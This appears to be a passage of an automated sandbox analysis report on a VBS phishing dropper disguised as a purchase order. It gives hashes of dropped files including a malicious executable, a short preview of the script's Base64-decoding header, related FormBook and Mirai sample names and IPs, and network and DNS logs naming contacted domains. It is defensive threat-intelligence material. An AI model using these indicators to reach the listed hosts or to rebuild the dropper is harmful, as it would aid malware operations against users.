                                                PO2412010.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                http://divisioninfo.net/Get hashmaliciousUnknownBrowse
                                                • 103.224.182.251
                                                Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 103.224.182.242
                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                attached invoice.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242
                                                ELIA-60USgllYLLq5op.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.15
                                                ZKByZWlOxI.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.16
                                                9bRba4KOfR.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.24
                                                OlyIcHfaN3.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.31
                                                Nrpcnq6Smf.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.61.241
                                                arm.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.44
                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.52
                                                AIreW57ZMM.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.25
                                                ibJ2YDOIir.elfGet hashmaliciousMiraiBrowse
                                                • 185.57.62.34
                                                vrJT5ZxIeO.elfGet hashmaliciousUnknownBrowse
                                                • 185.57.62.12

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):226
                                                Entropy (8bit):5.360398796477698
                                                Encrypted:false
                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                C:\Users\user\AppData\Local\Temp\47T9R4KG

                                                Download File
                                                Process:C:\Windows\SysWOW64\chkntfs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.121297215059106
                                                Encrypted:false
                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\x.exe

                                                Download File
                                                Process:C:\Windows\System32\wscript.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):335360
                                                Entropy (8bit):7.903407989667696
                                                Encrypted:false
                                                SSDEEP:6144:olxP3BuIQQMqMLZFGLrtFaVkZKwQabJ4klsdy9Urg/rlAji5eyh2ptWlT6trxkD/:obP33yqMdFGLxFRUwz7Gy9oCrz5xMtW5
                                                MD5:D9A430A4C9B06A9C5F69147498335567
                                                SHA1:F91B0388A404A217B4ACC5A164133EC5F4005A6F
                                                SHA-256:0078E04B8BE75F019E8137D0276567A7C47B14224E0F7AAD2B3585BB4C8BAE45
                                                SHA-512:A3A68669137192EA91DF582049516887C95CD0BD77A6BA500C74DDE23ADDB3C8618901BD91AA3C6A12869151342E10139DD3E9AC8B5CE07D637E50D7088A9E24
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 55%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e............"...0..............3... ...@....@.. ....................................`.................................X3..S....@.......................`.......2..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................3......H............q......@...P................................................I.\.H..R..|wo.....p.3..6..^'...OW.%d.:...Q......89.....L.y$....~.a.mu.G...[.....U.u?.L.7..v..~....CRr..0.P..z`.&ca%L.v.oX..~8.H.I.z9j_.. )...|....h,m.'cy.$}5.%.Q.c)...?q....14.>.y..t..%...N0J.^..P].. ..3.L\.....k7.@T...e....C..d`.N.AS..m1..aC...8..X......-T....\o...*@.n.I.0.....7..6...D.....0...:9.Og,]`....b..E.qd..d ~ G...U......w`....Nm..q..)...&w._..;..E\.g.F.....!..X.3.DE.m$QO..

                                                Static File Info

                                                General

                                                File type:ASCII text, with very long lines (65235), with CRLF line terminators
                                                Entropy (8bit):5.987122412782155
                                                TrID:
                                                • Visual Basic Script (13500/0) 100.00%
                                                File name:PO1341489LTB GROUP.vbs
                                                File size:465'760 bytes
                                                MD5:fe2b1e9947e1f7ab65d6542ba1abccc0
                                                SHA1:2753756f5438d94c49fad80ba14bb5440a4b260a
                                                SHA256:d618b1d56fbd24ce3c15bfd5c238f9ad8695156667d4b6e04c378f8eca6e34d7
                                                SHA512:0390d5adeaa53471abea236fe16dfd2ea1f35f98028899b80bc42e338d55156a80d56b0c347727778874a8a7496e18e943f36b1aea3585bb6a2569e774fc9283
                                                SSDEEP:6144:+4RU/er9SEoegy/BCHgjsFXQxe/AbfFi/UcVSSMbv+cO2GGCsuqxbw:+OcmpCHgjsF87DFi/BMfGdqx8
                                                TLSH:2BA4E021C515A23FCEAA8F9E72040FE2B8F4047EDE89D646F40F586A5EF46354476F28
                                                File Content Preview:' Define constants for XML and Base64 processing..Const XML_TYPE = "MSXML2.DOMDocument"..Const ELEMENT_TYPE = "text"..Const DATA_TYPE = "bin.base64"....' Declare variables..Dim base64EncodedString, tempFolderPath, executablePath....' Initialize the Base64

                                                File Icon

                                                Icon Hash:68d69b8f86ab9a86

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 17, 2024 03:40:53.211585045 CET4976480192.168.2.5208.91.197.27
                                                Dec 17, 2024 03:40:53.332360029 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:40:53.332457066 CET4976480192.168.2.5208.91.197.27
                                                Dec 17, 2024 03:40:53.342633963 CET4976480192.168.2.5208.91.197.27
                                                Dec 17, 2024 03:40:53.462415934 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:40:55.006685972 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:40:55.006721973 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:40:55.006757975 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:40:55.006880045 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:40:55.006903887 CET4976480192.168.2.5208.91.197.27
                                                Dec 17, 2024 03:40:55.006993055 CET4976480192.168.2.5208.91.197.27
                                                Dec 17, 2024 03:40:55.011595011 CET4976480192.168.2.5208.91.197.27
                                                Dec 17, 2024 03:40:55.131388903 CET8049764208.91.197.27192.168.2.5
                                                Dec 17, 2024 03:41:10.577919006 CET4980580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:10.697860003 CET8049805103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:10.700676918 CET4980580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:10.722001076 CET4980580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:10.842021942 CET8049805103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:11.932759047 CET8049805103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:11.932800055 CET8049805103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:11.932925940 CET4980580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:12.237056017 CET4980580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:13.255319118 CET4981280192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:13.375114918 CET8049812103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:13.375207901 CET4981280192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:13.387609005 CET4981280192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:13.507371902 CET8049812103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:14.610407114 CET8049812103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:14.610488892 CET8049812103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:14.610542059 CET4981280192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:14.913630009 CET4981280192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:15.927184105 CET4981880192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:16.046937943 CET8049818103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:16.047044039 CET4981880192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:16.060264111 CET4981880192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:16.180124998 CET8049818103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:16.180212021 CET8049818103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:17.322793961 CET8049818103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:17.322853088 CET8049818103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:17.322910070 CET4981880192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:17.593647957 CET4981880192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:18.599076986 CET4982580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:18.718866110 CET8049825103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:18.719033957 CET4982580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:18.727762938 CET4982580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:18.848069906 CET8049825103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:19.988640070 CET8049825103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:19.988773108 CET8049825103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:19.988806009 CET8049825103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:19.988922119 CET4982580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:19.988961935 CET4982580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:19.993052959 CET4982580192.168.2.5103.224.182.242
                                                Dec 17, 2024 03:41:20.113534927 CET8049825103.224.182.242192.168.2.5
                                                Dec 17, 2024 03:41:25.550228119 CET4984480192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:25.669965029 CET8049844199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:25.670066118 CET4984480192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:25.685750008 CET4984480192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:25.805506945 CET8049844199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:26.808120012 CET8049844199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:26.808142900 CET8049844199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:26.808197021 CET4984480192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:27.190165997 CET4984480192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:28.209031105 CET4985180192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:28.328713894 CET8049851199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:28.328814030 CET4985180192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:28.342521906 CET4985180192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:28.462348938 CET8049851199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:29.469501019 CET8049851199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:29.469604969 CET8049851199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:29.469660044 CET4985180192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:29.846389055 CET4985180192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:30.864737034 CET4985780192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:30.984512091 CET8049857199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:30.984703064 CET4985780192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:30.996507883 CET4985780192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:31.116492033 CET8049857199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:31.116513968 CET8049857199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:32.091340065 CET8049857199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:32.091435909 CET8049857199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:32.091483116 CET4985780192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:32.502588034 CET4985780192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:33.525619984 CET4986380192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:33.645828962 CET8049863199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:33.645911932 CET4986380192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:33.653446913 CET4986380192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:33.773322105 CET8049863199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:34.752705097 CET8049863199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:34.752918005 CET8049863199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:34.752994061 CET4986380192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:34.785953999 CET4986380192.168.2.5199.15.251.162
                                                Dec 17, 2024 03:41:34.905848980 CET8049863199.15.251.162192.168.2.5
                                                Dec 17, 2024 03:41:40.873377085 CET4987980192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:40.993096113 CET8049879199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:40.993222952 CET4987980192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:41.013180017 CET4987980192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:41.133339882 CET8049879199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:42.257824898 CET8049879199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:42.257883072 CET8049879199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:42.257942915 CET4987980192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:42.518311977 CET4987980192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:43.537504911 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:43.657366037 CET8049886199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:43.657461882 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:43.677175999 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:43.796998978 CET8049886199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:44.910455942 CET8049886199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:44.910624027 CET8049886199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:44.910770893 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:45.190260887 CET4988680192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.209836006 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.329674959 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:46.329793930 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.353830099 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:46.473623991 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:46.473701954 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:47.563179016 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:47.563297033 CET8049892199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:47.563371897 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:47.862080097 CET4989280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:48.882781029 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:49.002458096 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:49.002672911 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:49.013583899 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:49.133327961 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:50.236946106 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:50.237127066 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:50.237181902 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:50.369240999 CET4990280192.168.2.5199.193.6.134
                                                Dec 17, 2024 03:41:50.488944054 CET8049902199.193.6.134192.168.2.5
                                                Dec 17, 2024 03:41:55.974720001 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:56.094428062 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:56.094526052 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:56.111262083 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:56.231034994 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:57.208544016 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:57.208688974 CET804991852.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:57.208810091 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:57.627763987 CET4991880192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:58.645817995 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:58.786267996 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:58.786343098 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:58.800487041 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:41:59.029165983 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:59.898473978 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:59.898495913 CET804992452.60.87.163192.168.2.5
                                                Dec 17, 2024 03:41:59.898607969 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:00.315186977 CET4992480192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.333448887 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.453350067 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:01.454343081 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.467783928 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:01.587675095 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:01.587691069 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:02.625368118 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:02.649990082 CET804993152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:02.650058985 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:02.971452951 CET4993180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:03.995183945 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:04.115307093 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:04.115447044 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:04.124947071 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:04.244852066 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227713108 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227760077 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227838993 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227982044 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.227991104 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228013992 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228040934 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228246927 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228256941 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228266001 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228317022 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228317022 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.228593111 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228606939 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.228681087 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.347732067 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.347811937 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.351277113 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.351900101 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.393213987 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.419807911 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.419891119 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.422633886 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.424006939 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.427952051 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:05.428091049 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.431216955 CET4994180192.168.2.552.60.87.163
                                                Dec 17, 2024 03:42:05.551088095 CET804994152.60.87.163192.168.2.5
                                                Dec 17, 2024 03:42:11.643682957 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:11.763451099 CET804995718.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:11.763979912 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:11.776240110 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:11.895895004 CET804995718.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:13.288774967 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:13.409030914 CET804995718.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:13.409183979 CET4995780192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.302330971 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.422105074 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:14.422278881 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.435077906 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:14.554909945 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:15.940125942 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:16.014107943 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:16.014471054 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:16.016839027 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:16.016839027 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:16.060374975 CET804996318.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:16.063134909 CET4996380192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.317512989 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.437339067 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:17.438874006 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.451250076 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:17.571239948 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:17.571301937 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:18.955713034 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.036968946 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:19.037044048 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:19.037055969 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.037134886 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.075397968 CET804997418.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:19.075459957 CET4997480192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:19.974136114 CET4998080192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:20.093977928 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:20.094973087 CET4998080192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:20.107106924 CET4998080192.168.2.518.166.177.211
                                                Dec 17, 2024 03:42:20.226814032 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:21.676249027 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:21.676273108 CET804998018.166.177.211192.168.2.5
                                                Dec 17, 2024 03:42:21.676400900 CET4998080192.168.2.518.166.177.211

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 17, 2024 03:40:52.753487110 CET5239153192.168.2.51.1.1.1
                                                Dec 17, 2024 03:40:53.204112053 CET53523911.1.1.1192.168.2.5
                                                Dec 17, 2024 03:41:10.052181959 CET6399053192.168.2.51.1.1.1
                                                Dec 17, 2024 03:41:10.574491978 CET53639901.1.1.1192.168.2.5
                                                Dec 17, 2024 03:41:25.005884886 CET5802053192.168.2.51.1.1.1
                                                Dec 17, 2024 03:41:25.547740936 CET53580201.1.1.1192.168.2.5
                                                Dec 17, 2024 03:41:39.802359104 CET5146353192.168.2.51.1.1.1
                                                Dec 17, 2024 03:41:40.799827099 CET5146353192.168.2.51.1.1.1
                                                Dec 17, 2024 03:41:40.871130943 CET53514631.1.1.1192.168.2.5
                                                Dec 17, 2024 03:41:41.025144100 CET53514631.1.1.1192.168.2.5
                                                Dec 17, 2024 03:41:55.382311106 CET6339853192.168.2.51.1.1.1
                                                Dec 17, 2024 03:41:55.969944000 CET53633981.1.1.1192.168.2.5
                                                Dec 17, 2024 03:42:10.444118023 CET6300453192.168.2.51.1.1.1
                                                Dec 17, 2024 03:42:11.459353924 CET6300453192.168.2.51.1.1.1
                                                Dec 17, 2024 03:42:11.641071081 CET53630041.1.1.1192.168.2.5
                                                Dec 17, 2024 03:42:11.684582949 CET53630041.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 17, 2024 03:40:52.753487110 CET192.168.2.51.1.1.10x90c1Standard query (0)www.northidahoscans.onlineA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:10.052181959 CET192.168.2.51.1.1.10x69a8Standard query (0)www.brickhills.siteA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:25.005884886 CET192.168.2.51.1.1.10xa80dStandard query (0)www.pin-ballerz.netA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:39.802359104 CET192.168.2.51.1.1.10x4d33Standard query (0)www.allstary.topA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:40.799827099 CET192.168.2.51.1.1.10x4d33Standard query (0)www.allstary.topA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:55.382311106 CET192.168.2.51.1.1.10xd2d2Standard query (0)www.waytoocool.lifeA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:42:10.444118023 CET192.168.2.51.1.1.10xf526Standard query (0)www.timai.shopA (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:42:11.459353924 CET192.168.2.51.1.1.10xf526Standard query (0)www.timai.shopA (IP address)IN (0x0001)false

